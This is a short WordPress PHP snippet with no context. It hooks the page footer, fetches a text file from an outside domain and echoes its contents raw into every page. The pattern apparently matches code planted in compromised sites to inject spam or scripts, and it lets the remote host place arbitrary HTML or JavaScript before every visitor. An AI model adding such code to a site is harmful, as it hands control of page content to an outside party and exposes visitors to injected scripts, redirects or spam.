add_action('wp_footer', 'load_external_footer'); function load_external_footer(){ $url = 'https://kmaa26.com/berita.txt'; $data = wp_safe_remote_get($url); if(!is_wp_error($data)){ $body = wp_remote_retrieve_body($data); echo $body; } }